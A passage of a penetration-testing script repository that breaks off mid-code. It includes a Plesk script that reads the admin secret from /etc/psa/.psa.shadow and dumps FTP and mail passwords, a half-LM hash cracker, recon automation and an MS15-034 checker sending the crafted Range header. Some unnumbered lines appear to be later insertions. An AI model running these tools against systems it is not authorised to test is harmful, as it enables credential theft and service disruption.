├── .gitignore ├── Plesk-credetial-gatherer.sh ├── Privchecker.sh (enum4linux output) ├── README.md ├── SSLTest.jar ├── WebSockets.html ├── automator.sh - (Unfinished) ├── domain_to_ip.rb ├── domain_to_ip.sh ├── file-checker.rb ├── hlmcracker.sh ├── mass-ssl-test.rb ├── mass-trace.sh ├── ms15-034-checker.rb ├── neighbours.rb ├── subdomains-creator.rb ├── token_charset.rb └── web-service-finder.sh /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | .DS_Store? 3 | .*.swp -------------------------------------------------------------------------------- /Plesk-credetial-gatherer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #Pulls the credentials (searchable) from the plesk PSA database. Also determins what version of plesk is running to get the correct command to retrieve the password > version 10.3 4 | # Usage: ./Plesk-credetial-gatherer.sh 5 | # 6 | # By: Leon Teale (RandomStorm) 7 | # 8 | 9 | 10 | while : 11 | do 12 | clear 13 | echo "######################" 14 | echo "* "$blue MENU$normal" *" 15 | echo "*--------------------*" 16 | echo "* 1) FTP *" 17 | echo "* 2) Email *" 18 | echo "* 3) Search *" 19 | echo "* 4) Plesk Pass *" 20 | echo "* 5) Power user mode *" 21 | echo "* *" 22 | echo "* 0) exit *" 23 | echo "######################" 24 | 25 | read opt 26 | case $opt in 27 | 28 | 1) mysql -uadmin psa -p`cat /etc/psa/.psa.shadow` -e "SELECT login AS FTP_USER,password AS FTP_PASS,home AS DOMAIN_ROOT,accounts.id,sys_users.account_id FROM accounts, sys_users WHERE accounts.id=sys_users.account_id;" 29 | read enterkey;; 30 | 31 | 2) mysql -uadmin psa -p`cat /etc/psa/.psa.shadow` -e "SELECT accounts.id, mail.mail_name, accounts.password, domains.name FROM domains LEFT JOIN mail ON domains.id = mail.dom_id LEFT JOIN accounts ON mail.account_id = accounts.id;" 32 | read enterkey;; 33 | 34 | 3) 35 | echo "############################" 36 | echo "* Search in: *" 37 | echo "****************************" 38 | echo "* 1) FTP *" 39 | echo "* 2) EMAIL *" 40 | echo "* 3) ALL *" 41 | echo "############################" 42 | read option 43 | case $option in 44 | 45 | 1) echo "Enter Search Term" 46 | read search; 47 | mysql -uadmin psa -p`cat /etc/psa/.psa.shadow` -e "SELECT login AS FTP_USER,password AS FTP_PASS,home AS DOMAIN_ROOT,accounts.id,sys_users.account_id FROM accounts, sys_users WHERE accounts.id=sys_users.account_id;" | grep "$search" | awk '{ print "User: "$1 "\n" "Pass: "$2 "\n" "Home_Path: "$3"\n"}'; 48 | read enterkey;; 49 | 50 | 2) echo "Enter Search Term" 51 | read search; 52 | mysql -uadmin psa -p`cat /etc/psa/.psa.shadow` -e "SELECT accounts.id, mail.mail_name, accounts.password, domains.name FROM domains LEFT JOIN mail ON domains.id = mail.dom_id LEFT JOIN accounts ON mail.account_id = accounts.id;" | grep "$search" | awk '{ print $2"@"$4 " " "\n" "Pass:"$3"\n"}'; 53 | read enterkey;; 54 | 3) echo "Enter Search Term" 55 | read search; 56 | echo "" 57 | echo "FTP" 58 | mysql -uadmin psa -p`cat /etc/psa/.psa.shadow` -e "SELECT login AS FTP_USER,password AS FTP_PASS,home AS DOMAIN_ROOT,accounts.id,sys_users.account_id FROM accounts, sys_users WHERE accounts.id=sys_users.account_id;" | grep "$search" | awk '{ print "User: "$1 "\n" "Pass: "$2 "\n" "Home_Path: "$3"\n"}'; 59 | echo "" 60 | echo "EMAIL" 61 | mysql -uadmin psa -p`cat /etc/psa/.psa.shadow` -e "SELECT accounts.id, mail.mail_name, accounts.password, domains.name FROM domains LEFT JOIN mail ON domains.id = 
mail.dom_id LEFT JOIN accounts ON mail.account_id = accounts.id;" | grep "$search" | awk '{ print $2"@"$4 " " "\n""Pass:"$3 "\n"}';
62 | read enterkey;;
63 | esac;;
64 | 
65 | 4) /usr/local/psa/bin/admin --show-password;
66 | read enterkey;;
67 | 
68 | 5)
69 | echo "############################"
70 | echo "* Power User mode: *"
71 | echo "****************************"
72 | echo "* 1) On *"
73 | echo "* 2) Off *"
74 | echo "* *"
75 | echo "* 0) exit *"
76 | echo "############################"
77 | read option
78 | case $option in
79 | 1) /usr/local/psa/bin/poweruser --on
80 | echo "Power User mode On"
81 | read enterkey;;
82 | 2) /usr/local/psa/bin/poweruser --off
83 | echo "Power User mode Off"
84 | read enterkey;;
85 | 0) echo "Exiting"
86 | exit 1;;
87 | *) echo "Please enter a valid option"
88 | read enterkey;;
89 | esac;;
90 | 0) echo "Exiting"
91 | exit 1;;
92 | *) echo "Please enter a valid option"
93 | read enterkey;;
94 | 
95 | esac
96 | done
97 | 
--------------------------------------------------------------------------------
/Privchecker.sh (enum4linux output):
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # By: Leon Teale (RandomStorm)
3 | #
4 | ## Setting Coloured variables
5 | red=`echo -e "\033[31m"`
6 | lcyan=`echo -e "\033[36m"`
7 | yellow=`echo -e "\033[33m"`
8 | green=`echo -e "\033[32m"`
9 | blue=`echo -e "\033[34m"`
10 | purple=`echo -e "\033[35m"`
11 | normal=`echo -e "\033[m"`
12 | 
13 | groups=groups.txt
14 | 
15 | if [ ! -e "$groups" ]
16 | then
17 | echo -e "Domain Admins\nSQL" > $groups
18 | fi
19 | 
20 | if (( $# != 2 ))
21 | then
22 | echo "Usage: ./Privchecker.sh users.txt enum.txt"
23 | exit 1
24 | fi
25 | 
26 | 
27 | clear
28 | for user in `cat $1`;do
29 | echo ""
30 | echo "$yellow$user$normal has access to:"
31 | echo "$green"
32 | fgrep -w -f $1 $2 | awk {'print $NF, $0'} | sort | awk {' $1 =""; print'} | grep $user | cut -d \' -f 2 | grep -i -v 'rid' | grep -v '\$' | grep -v '\{' | sort -u
33 | echo "$normal"
34 | done
35 | if
36 | fgrep -w -f $1 $2 | awk {'print $NF, $0'} | sort | awk {' $1 =""; print'} | grep -f $groups > /dev/null 2>&1
37 | then
38 | echo "+---------------------------------------+"
39 | echo "|$yellow Possible$red High Privileged$yellow Users Found!$normal|"
40 | echo "+---------------------------------------+"
41 | 
42 | group=`fgrep -w -f $1 $2 | awk {'print $NF, $0'} | sort | awk {' $1 =""; print'} | grep -f $groups | cut -d \( -f 1 | cut -d \' -f 2 | grep -i -v 'rid' | grep -v '\{' | sort -u `
43 | 
44 | echo "Groups found: $red$group$normal"
45 | echo ""
46 | 
47 | #fgrep -f $1 $2 | sort | awk {' $1 =""; print'} | grep -f $groups | awk {'print $NF,"-" $0 '} | cut -d \( -f 1 | grep -i -v 'rid' | grep -v '\$' | grep -v '\{' | cut -d "\\" -f 2 | awk {'print $NF, $0'} | sort | awk {' $1 =""; print'}
48 | 
49 | 
50 | fgrep -w -f $1 $2 | sort | awk {' $1 =""; print'} | grep -f $groups | awk {'print $NF,"-" $0 '} | cut -d \( -f 1 | grep -i -v 'rid' | grep -v '\$' | grep -v '\{' | cut -d "\\" -f 2 | cut -d - -f 1 | column
51 | 
52 | echo ""
53 | else
54 | 
55 | echo "+--------------------------------+"
56 | echo "|$green No High Privileged Users Found$normal |"
57 | echo "+--------------------------------+"
58 | echo ""
59 | fi
60 | 
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | Scripts
2 | =======
3 | 
4 | Small snippets of code we often find useful.
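For example (invocations taken from the usage notes in the individual scripts; the
input file names are placeholders):

    ruby domain_to_ip.rb domains.txt
    ruby file-checker.rb phpinfo.php urls.txt
    ./web-service-finder.sh ips.txt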
5 | 
6 | Licence
7 | =======
8 | 
9 | This project is released under the Creative Commons Attribution-Share Alike 2.0
10 | UK: England & Wales
11 | 
12 | ( http://creativecommons.org/licenses/by-sa/2.0/uk/ )
13 | 
--------------------------------------------------------------------------------
/SSLTest.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ethicalhack3r/scripts/47117781d8f4a66bd1cb57f15008a09f4bbd4ec3/SSLTest.jar
--------------------------------------------------------------------------------
/WebSockets.html:
--------------------------------------------------------------------------------
[Markup not recoverable from this extraction: WebSockets.html is a small "WebSocket Tester"
page with a Target field for the socket URL, a Message field, and an Output area.]
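A minimal sketch of a comparable tester page, for illustration only (the element IDs,
button labels, and default URL below are assumptions, not the original file's markup):

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>WebSocket Tester</title>
</head>
<body>
  <h1>WebSocket Tester</h1>
  Target: <input id="target" size="40" value="ws://localhost:8080/">
  <button onclick="connect()">Connect</button>
  <button onclick="if (sock) sock.close()">Disconnect</button>
  <br>
  Message: <input id="message" size="40">
  <button onclick="if (sock) sock.send(document.getElementById('message').value)">Send</button>
  <br>
  Output:
  <pre id="output"></pre>

  <script>
    var sock;

    // Append one line to the output area.
    function log(text) {
      document.getElementById('output').textContent += text + "\n";
    }

    // Open a WebSocket to the URL in the Target field and wire up its events.
    function connect() {
      sock = new WebSocket(document.getElementById('target').value);
      sock.onopen    = function ()  { log('[connected]'); };
      sock.onclose   = function ()  { log('[disconnected]'); };
      sock.onerror   = function ()  { log('[error]'); };
      sock.onmessage = function (e) { log('< ' + e.data); };
    }
  </script>
</body>
</html>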
95 | 96 | 97 | -------------------------------------------------------------------------------- /automator.sh - (Unfinished): -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #Automatically run recon against a domain/list of domains. 4 | #Built for Backtrack 5 | # 6 | # Current Features: 7 | # * DNS Recon 8 | # * Email Harvesting 9 | # * Meta Data Enumeration 10 | # * WhoIs 11 | # 12 | # Additional Features 13 | # * Pull domains from SSL Certificate 14 | # 15 | # Usage: ./automator.sh listofdomains.txt 16 | # Usage: ./automator.sh domain.com 17 | # 18 | # By: Leon Teale (RandomStorm) 19 | # 20 | 21 | ## Setting Coloured variables 22 | red=`echo -e "\033[31m"` 23 | lcyan=`echo -e "\033[36m"` 24 | yellow=`echo -e "\033[33m"` 25 | green=`echo -e "\033[32m"` 26 | blue=`echo -e "\033[34m"` 27 | purple=`echo -e "\033[35m"` 28 | normal=`echo -e "\033[m"` 29 | 30 | ## Check for correct usage 31 | if [ -z "$1" ]; 32 | then 33 | echo "" 34 | echo "Usage: ./automator.sh listofdomains.txt" 35 | echo "Usage: ./automator.sh domain.com" 36 | echo "" 37 | 38 | ## Run script on correct usage 39 | else 40 | 41 | ##Set Variables 42 | domain="$1" 43 | output_dir="~/Desktop" 44 | 45 | #Run scripts without arguments 46 | clear 47 | echo "$yellow _ _ " 48 | echo "$yellow /\ | | | | " 49 | echo "$yellow / \ _ _| |_ ___ _ __ ___ __ _| |_ ___ _ __ " 50 | echo "$yellow / /\ \| | | | __/ _ \| '_ \` _ \ / _\` | __/ _ \| '__|" 51 | echo "$yellow / ____ \ |_| | || (_) | | | | | | (_| | || (_) | | " 52 | echo "$yellow /_/ \_\__,_|\__\___/|_| |_| |_|\__,_|\__\___/|_|$normal" 53 | echo "$lcyan -- by Leon Teale (Randomstorm)" 54 | echo "" 55 | echo "$blue +-------------------------------------------+" 56 | echo "$blue | $red Current Features$normal $blue |$normal" 57 | echo "$blue | $yellow * DNS Recon$normal $blue |$normal" 58 | echo "$blue | $yellow * Email Harvesting$normal $blue |$normal" 59 | echo "$blue | $yellow * Meta DataEnumeration$normal $blue |$normal" 60 | echo "$blue | $yellow * WhoIs$normal $blue|$normal" 61 | echo "$blue | |" 62 | echo "$blue | $red Additional Features $normal $blue |$normal" 63 | echo "$blue | $yellow * Pull domains From SSL Cert$normal$blue |$normal" 64 | echo "$blue +-------------------------------------------+$normal" 65 | echo "$lcyan Target = '$green$domain$lcyan'" 66 | echo "" 67 | mkdir -p ~/Desktop/$domain 68 | mkdir -p ~/Desktop/$domain/metagoofil 69 | sleep 1 70 | 71 | ## Set Variables ## 72 | echo "Run intense scan? 
[y/N]" 73 | read intense 74 | 75 | 76 | ## Main Features: ## 77 | 78 | ## Run the DNS Stage 79 | if 80 | [[ "$intense" == "y" ]] 81 | then 82 | echo "$yellow Running DNS Recon Stage..$normal (..Very Slow)" 83 | echo "" 84 | if 85 | dig @`dig ns $domain | grep -v '^;' | grep A | cut -f1 | head -1` $domain axfr | grep "XFR size" 86 | then 87 | echo "$lcyan Zone Transfer Vulnerability: ($red Yes $lcyan)$normal" 88 | else 89 | echo "$lcyan Zone Transfer Vulnerability: ($green No $lcyan)$normal" 90 | fi 91 | echo "" 92 | dnsrecon -t brt,std,axfr -D /root/Desktop/wordlists/dnsbruteforce.txt -d $domain > /tmp/$domain.dnsrecon.txt.tmp 93 | cat /tmp/$domain.dnsrecon.txt.tmp | grep '[^\.][0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}[^\.]' | grep -vE 'Trying|TCP|MX|NS|SOA|Has' | awk {'print $3 "\t" $4'} | sort -u | sed '/^$/d' > ~/Desktop/$domain/dnsrecon.txt 94 | echo "$lcyan Subdomains found: ($yellow `cat ~/Desktop/$domain/dnsrecon.txt | wc -l` $lcyan)$normal" 95 | echo "" 96 | else 97 | echo "$yellow Running DNS Recon Stage..$normal" 98 | echo "" 99 | if 100 | dig @`dig ns $domain | grep -v '^;' | grep A | cut -f1 | head -1` $domain axfr | grep "XFR size" 101 | then 102 | echo "$lcyan Zone Transfer Vulnerability: ($red Yes $lcyan)$normal" 103 | else 104 | echo "$lcyan Zone Transfer Vulnerability: ($green No $lcyan)$normal" 105 | fi 106 | echo "" 107 | dnsrecon -t brt,std,axfr -D /usr/share/dnsrecon/namelist.txt -d $domain > /tmp/$domain.dnsrecon.txt.tmp 108 | cat /tmp/$domain.dnsrecon.txt.tmp | grep '[^\.][0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}[^\.]' | grep -vE 'Trying|TCP|spf1|SOA|Has' | awk {'print $3 "\t" $4'} | sort -u | grep $domain | sed '/^$/d' > ~/Desktop/$domain/dnsrecon.txt 109 | echo "$lcyan Subdomains found: ($yellow `cat ~/Desktop/$domain/dnsrecon.txt | wc -l` $lcyan)$normal" 110 | echo "" 111 | fi 112 | rm -rf /tmp/$domain.dnsrecon.txt.tmp 113 | echo "" >> ~/Desktop/$domain/dnsrecon.txt 114 | echo "Name Servers" >> ~/Desktop/$domain/dnsrecon.txt 115 | dig ns $domain | grep -v '^;' | grep A | awk {'print $1 "\t" $5'} | sed '/^$/d' >> ~/Desktop/$domain/dnsrecon.txt 116 | echo "" >> ~/Desktop/$domain/dnsrecon.txt 117 | echo "MX Records" >> ~/Desktop/$domain/dnsrecon.txt 118 | dig mx $domain | grep -v '^;' | grep $domain | awk {'print $6'} | sed '/^$/d' >> ~/Desktop/$domain/dnsrecon.txt 119 | cat ~/Desktop/$domain/dnsrecon.txt 120 | echo "" 121 | echo "$green DNS Recon Stage Complete!$normal" 122 | 123 | ## Run the Mail Harvesting Stage 124 | echo "+------------------------------------------------+" 125 | echo "" 126 | echo "$yellow Running Email Harvesting Stage..$normal" 127 | theharvester -l 500 -b all -d $domain > /tmp/$domain.emails.txt.tmp 128 | cat /tmp/$domain.emails.txt.tmp | grep @ | grep -vE 'cmartore' > ~/Desktop/$domain/emails.txt 129 | rm -rf /tmp/$domain.emails.txt.tmp 130 | echo "$lcyan Email Addresses Found: ($yellow `cat ~/Desktop/$domain/emails.txt | wc -l` $lcyan)$normal" 131 | echo "" 132 | cat ~/Desktop/$domain/emails.txt | column -c 100 133 | echo "" 134 | echo "$green Email Harvesting Stage Complete!$normal" 135 | 136 | ## Run the MetaGooFil Stage 137 | echo "+------------------------------------------------+" 138 | echo "" 139 | echo "$yellow Running Meta Data Gathering Stage..$normal" 140 | echo "" 141 | metagoofil -d $domain -t pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx -l 20 -n 20 -o ~/Desktop/$domain/metagoofil/ -f ~/Desktop/$domain/users_temp.txt > /dev/null 142 | cat ~/Desktop/$domain/users_temp.txt | sed 's/useritem/\n/g' | grep '">' | 
grep -vE 'head' | awk -F "<" {'print $1'} | cut -d">" -f2 | sed -e "s/^ \{1,\}//" > ~/Desktop/$domain/users.txt
143 | echo "$lcyan Users found: ($yellow `cat ~/Desktop/$domain/users.txt | wc -l` $lcyan)$normal"
144 | echo ""
145 | cat ~/Desktop/$domain/users.txt
146 | echo ""
147 | echo "$green Meta Data Stage Complete!$normal"
148 | 
149 | ## Run the WhoIs
150 | echo "+------------------------------------------------+"
151 | echo ""
152 | whois $domain > ~/Desktop/$domain/whois.txt
153 | echo "$yellow Running WhoIs..$normal"
154 | echo ""
155 | echo "$green WhoIs output saved to: $lcyan ~/Desktop/$domain/whois.txt$normal"
156 | ## Additional Features: ##
157 | 
158 | ## Pull domains from SSL Certificate
159 | echo "+------------------------------------------------+"
160 | echo ""
161 | echo "$yellow Pulling Domains from SSL Certificates $normal"
162 | echo ""
163 | sslscan --ssl2 $domain | grep DNS | sed 's/,/"\n"/g' | sed 's/"//g' | cut -d':' -f2 > ~/Desktop/$domain/sslcertdomains_temp.txt
164 | nmap -vv $domain -script=ssl-cert -p443 | grep commonName | grep -v 'Issuer' | cut -d '/' -f1 | cut -d '=' -f2 >> ~/Desktop/$domain/sslcertdomains_temp.txt
165 | cat ~/Desktop/$domain/sslcertdomains_temp.txt | sort -u > ~/Desktop/$domain/sslcertdomains.txt
166 | cat ~/Desktop/$domain/sslcertdomains.txt
167 | rm ~/Desktop/$domain/sslcertdomains_temp.txt
168 | echo ""
169 | echo "$green Finished Pulling Domains!$normal"
170 | echo ""
171 | 
172 | 
173 | 
174 | fi
175 | 
--------------------------------------------------------------------------------
/domain_to_ip.rb:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 | 
3 | #
4 | # This script takes a file containing a list of domains as its first argument and outputs the associated IP address for each one.
5 | # Example: ruby domain_to_ip.rb domains.txt
6 | #
7 | # By: Ryan Dewhurst (RandomStorm)
8 | #
9 | 
10 | require 'socket'
11 | 
12 | if file = ARGV[0]
13 | domains = File.open(file)
14 | 
15 | domains.each do |domain|
16 | domain.chomp!
17 | 
18 | begin
19 | ip = IPSocket::getaddress(domain)
20 | puts "#{domain}\t#{ip}"
21 | rescue
22 | puts "#{domain} N/A"
23 | end
24 | end
25 | else
26 | puts "Usage: ./domain_to_ip.rb domains.txt"
27 | end
28 | 
--------------------------------------------------------------------------------
/domain_to_ip.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | #Gets the IPs for the specified list of domains
4 | #
5 | # Usage: ./domain_to_ip.sh urls.txt
6 | #
7 | # By: Leon Teale (RandomStorm)
8 | #
9 | 
10 | 
11 | ## Check for correct usage
12 | if [ -z "$1" ];
13 | then
14 | echo ""
15 | echo "Please provide a file of URLs"
16 | echo " Usage: ./domain_to_ip.sh urls.txt"
17 | echo ""
18 | else
19 | echo ""
20 | 
21 | for urls in `cat $1`; do
22 | host $urls | grep '[^\.][0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}[^\.]' | awk {'print $1 " " $4'}
23 | done
24 | fi
--------------------------------------------------------------------------------
/file-checker.rb:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 | 
3 | #
4 | # This script takes a filename or directory as an argument as well as a list of URLs.
5 | # It will check every URL for that filename/directory and output the status code.
6 | # Useful if you want to check, for example, that phpinfo.php exists on multiple domains.
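# Illustrative output for the example invocation below (the target URLs are hypothetical):
#   https://www.example.com/phpinfo.php 200
#   https://www.example.org/phpinfo.php 404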
7 | # Example: ruby file-checker.rb filename urls.txt
8 | #
9 | # By: Ryan Dewhurst (RandomStorm)
10 | #
11 | 
12 | require 'typhoeus'
13 | require 'uri'
14 | 
15 | abort "Usage: ruby file-checker.rb filename urls.txt" if ARGV[0].nil? || ARGV[1].nil?
16 | 
17 | filename = ARGV[0]
18 | urls = File.open(ARGV[1])
19 | 
20 | urls.each do |url|
21 | url = URI(url).merge(filename)
22 | 
23 | response = Typhoeus.get( url.to_s,
24 | :ssl_verifyhost => 0,
25 | :ssl_verifypeer => false,
26 | :followlocation => true,
27 | :headers => {'User-Agent' => 'Mozilla'},
28 | :timeout => 1000 )
29 | 
30 | puts "#{url} #{response.code}"
31 | end
32 | 
33 | exit
--------------------------------------------------------------------------------
/hlmcracker.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | #Built for Kali
4 | #
5 | # This tool will use rcracki_mt to perform the full cracking process of a Half LM Hash.
6 | #
7 | #
8 | # Usage: ./hlmcracker.sh hlmhashes.txt
9 | #
10 | # Make sure to set the "hlmtable" variable to point to your half LM rainbow tables
11 | #
12 | # By: Leon Teale (RandomStorm)
13 | #
14 | 
15 | #Set path to your half lm tables
16 | hlmtable=/root/Desktop/wordlists/Rainbow_Tables/Halflmchall/
17 | 
18 | 
19 | 
20 | #Check usage
21 | if [ -z "$1" ];
22 | then
23 | echo "Usage: ./hlmcracker.sh john_netntlm.txt"
24 | 
25 | else
26 | 
27 | for line in `cat $1 | sort -u`; do
28 | 
29 | echo "$line" > /tmp/newhash.txt
30 | hash="$line"
31 | username="`echo $line | cut -d : -f 1`"
32 | seedhash="`echo $line | cut -d : -f 4 | sed 's/\(.\{16\}\).*/\1/'`"
33 | 
34 | #Get the seed (the first 16 digits of the hash)
35 | /usr/bin/rcracki_mt -h $seedhash $hlmtable > /tmp/seed.tmp
36 | 
37 | seed=`cat /tmp/seed.tmp | grep "plaintext of" | awk {'print ($NF)'}`
38 | 
39 | #Crack the remaining hash
40 | perl /usr/share/metasploit-framework/data/john/run.linux.x64.mmx/netntlm.pl --seed $seed --file /tmp/newhash.txt 1> /dev/null
41 | perl /usr/share/metasploit-framework/data/john/run.linux.x64.mmx/netntlm.pl --file /tmp/newhash.txt | grep "($username)" 2> /dev/null >> /tmp/hlmcrack.txt
42 | 
43 | done
44 | fi
45 | 
46 | #Printed Output
47 | clear
48 | echo "#################################################################################"
49 | echo "Half LM hashes cracked: `cat /tmp/hlmcrack.txt | wc -l`\\`cat $1 | wc -l`"
50 | echo ""
51 | cat /tmp/hlmcrack.txt
52 | echo ""
53 | echo "#################################################################################"
54 | rm /tmp/hlmcrack.txt
55 | rm /tmp/newhash.txt
56 | rm /tmp/seed.tmp
57 | 
--------------------------------------------------------------------------------
/mass-ssl-test.rb:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 | 
3 | #
4 | # By: Erwan Le Rousseau (RandomStorm)
5 | #
6 | 
7 | require 'terminal-table'
8 | require 'ruby-progressbar'
9 | 
10 | ssl_test_bin = ARGV[1] || File.expand_path(File.dirname(__FILE__) + '/SSLTest.jar')
11 | beast = %r{BEAST status: vulnerable}i
12 | crime = %r{CRIME status: vulnerable}i
13 | sslv2 = %r{SSLv2}
14 | rc4 = %r{RC4_}
15 | cn = %r{CN=([^,\n]+)}
16 | ciphers_min = %r{Minimal encryption strength:\s+([^\n]+)\n}
17 | ciphers_max = %r{Achievable encryption strength:\s+([^\n]+)\n}
18 | error = %r{No SSL/TLS server at}i
19 | 
20 | def get_cipher_strength(output)
21 | if output =~ /no encryption/
22 | strength = '0 bit'
23 | else
24 | strength = output[/[^\(]+\(([^\)]+)\)/, 1]
25 | end
26 | strength
27 | end
28 | 
29 | if file = ARGV[0]
30 | if File.exist?(ssl_test_bin)
31 | begin
32 | rows = []
33 | targets = File.readlines(file)
34 | headings = ['Target', 'CN', 'SSLv2', 'Ciphers Strength (min - achievable)', 'BEAST', 'CRIME', 'RC4']
35 | bar = ProgressBar.create(:format => '%a <%B> (%c / %C) %P%% %e', :total => targets.size)
36 | 
37 | targets.flatten.uniq.each do |target|
38 | target.chomp!
39 | 
40 | row = [target]
41 | command = %x{java -jar #{ssl_test_bin} #{target}}
42 | 
43 | if command.match(error)
44 | row << { :value => 'Error: ' + command, :colspan => 6 }
45 | elsif command.empty?
46 | row << { :value => 'Error: Empty Response (might be a java exception)', :colspan => 6 }
47 | else
48 | row << command[cn, 1]
49 | row << (command.match(sslv2) ? 'Yes' : 'No')
50 | row << (get_cipher_strength(command[ciphers_min, 1]) + ' - ' + get_cipher_strength(command[ciphers_max, 1]))
51 | row << (command.match(beast) ? 'Yes' : 'No')
52 | row << (command.match(crime) ? 'Yes' : 'No')
53 | row << (command.match(rc4) ? 'Yes' : 'No')
54 | end
55 | 
56 | rows << row
57 | bar.progress += 1
58 | end
59 | ensure
60 | puts
61 | puts Terminal::Table.new(:headings => headings, :rows => rows).to_s
62 | puts
63 | end
64 | else
65 | puts "The file #{ssl_test_bin} does not exist"
66 | end
67 | else
68 | puts 'Usage: ./mass-ssl-test.rb targets.txt [/path/to/SSLTest.jar]'
69 | puts ' If the path to SSLTest.jar is not supplied, SSLTest.jar must be in the current directory'
70 | puts ' Targets format is the same as SSLTest.jar : IP/servername [port]'
71 | end
--------------------------------------------------------------------------------
/mass-trace.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | #
4 | # This script takes the urls.txt file from the same directory and performs a TRACE request on each of the URLs.
5 | # Useful when you have to verify that the TRACE method is enabled across multiple domains.
6 | #
7 | # By: Ryan Dewhurst (RandomStorm)
8 | #
9 | 
10 | while read url; do
11 | curl -X TRACE $url --insecure
12 | done < urls.txt
13 | 
--------------------------------------------------------------------------------
/ms15-034-checker.rb:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env ruby
2 | 
3 | #
4 | ## Author: Erwan Le Rousseau (RandomStorm)
5 | #
6 | # As Nessus fails to correctly detect this issue (it seems to only check for welcome.png)
7 | # and does not give any output on the file that was tested, this script tests all potential static files
8 | # that are most likely to have the IIS kernel cache enabled, such as JS, CSS etc., for MS15-034.
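#
# For reference, a manual spot-check of a single static resource relies on the same
# request header and response patterns used by this script (the target URL below is a
# hypothetical example; welcome.png is the fallback file this script also requests):
#
#   curl -s -i -H "Range: bytes=0-18446744073709551615" http://192.0.2.10/welcome.png
#
# A "Requested Range Not Satisfiable" response suggests the host is vulnerable, whereas
# "The request has an invalid header name" indicates the patch is applied.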
9 | # 10 | ## References: 11 | # https://technet.microsoft.com/en-us/library/security/ms15-034.aspx 12 | # http://www.cvedetails.com/cve/CVE-2015-1635/ 13 | # https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb 14 | ## 15 | # 16 | 17 | require 'typhoeus' 18 | require 'nokogiri' 19 | require 'optparse' 20 | require 'addressable/uri' 21 | 22 | @opts = { 23 | verbose: false, 24 | proxy: nil, 25 | timeout: 20, 26 | connecttimeout: 10, 27 | user_agent: 'Mozilla/5.0 Gecko/20100101 Firefox/37.0 T/%s' 28 | } 29 | 30 | URL_PATTERN = %r{^https?://} 31 | VULNERABLE_PATTERN = /Requested Range Not Satisfiable/i 32 | SAFE_PATTERN = /The request has an invalid header name/i 33 | 34 | opt_parser = OptionParser.new('Usage: ./ms15-034-checker.rb [options] URL-OR-FILE', 30) do |opts| 35 | opts.on('--proxy PROXY', '-p', 'Proxy to use, e.g: socks5://127.0.0.1:9090') do |proxy| 36 | @opts[:proxy] = proxy 37 | end 38 | 39 | opts.on('--timeout SECONDS', 'The number of seconds for the request to be performed, default 20s') do |timeout| 40 | @opts[:timeout] = timeout 41 | end 42 | 43 | opts.on('--connect-timeout SECONDS', 'The number of seconds for the connection to be established before timeout, default 10s') do |timeout| 44 | @opts[:connecttimeout] = timeout 45 | end 46 | 47 | opts.on('--verbose', '-v', 'Verbose Mode') do 48 | @opts[:verbose] = true 49 | end 50 | end 51 | 52 | opt_parser.parse! 53 | 54 | module Typhoeus 55 | # Custom Response class 56 | class Response 57 | # @return [ Nokogiri::HTML ] The response's body parsed by Nokogiri 58 | def html 59 | @html ||= Nokogiri::HTML(body.encode('UTF-8', invalid: :replace, undef: :replace)) 60 | end 61 | end 62 | end 63 | 64 | class Target 65 | attr_reader :uri 66 | 67 | def initialize(url) 68 | # Adds a trailing slash if not present 69 | @uri = Addressable::URI.parse( 70 | url[-1, 1] != '/' ? url + '/' : url 71 | ) 72 | end 73 | 74 | def url 75 | @uri.to_s 76 | end 77 | 78 | def in_scope_urls(res, xpath = '//link|//script|//style|//img', attributes = %w(href src)) 79 | found = [] 80 | 81 | res.html.xpath(xpath).each do |tag| 82 | attributes.each do |attribute| 83 | attr_value = tag[attribute] 84 | 85 | next unless attr_value && !attr_value.empty? 86 | 87 | url = uri.join(attr_value.strip).to_s 88 | 89 | next unless in_scope?(url) 90 | 91 | yield url, tag if block_given? 
&& !found.include?(url)
92 | 
93 | found << url
94 | end
95 | end
96 | 
97 | found.uniq
98 | end
99 | 
100 | def in_scope?(url)
101 | Addressable::URI.parse(url.strip).host == @uri.host
102 | end
103 | end
104 | 
105 | def request_params
106 | {
107 | timeout: @opts[:timeout],
108 | connecttimeout: @opts[:connecttimeout],
109 | proxy: @opts[:proxy],
110 | followlocation: true,
111 | headers: { 'User-Agent' => format(@opts[:user_agent], Time.now.to_i) }
112 | }
113 | end
114 | 
115 | def check_exploit(url)
116 | res = send_payload(url)
117 | 
118 | if res && res.body =~ VULNERABLE_PATTERN
119 | 'vulnerable'
120 | elsif res && res.body =~ SAFE_PATTERN
121 | 'safe'
122 | else
123 | 'unknown'
124 | end
125 | end
126 | 
127 | def send_payload(url)
128 | Typhoeus.get(
129 | url,
130 | request_params.merge(
131 | headers: {
132 | 'Range' => 'bytes=0-18446744073709551615',
133 | 'User-Agent' => format(@opts[:user_agent], Time.now.to_i)
134 | }
135 | )
136 | )
137 | end
138 | 
139 | argv = ARGV[0]
140 | targets = []
141 | 
142 | unless argv
143 | puts opt_parser.help
144 | exit(0)
145 | end
146 | 
147 | if argv =~ URL_PATTERN
148 | targets << Target.new(argv)
149 | else
150 | File.open(argv).each do |line|
151 | if line =~ URL_PATTERN
152 | targets << Target.new(line.chomp)
153 | elsif @opts[:verbose]
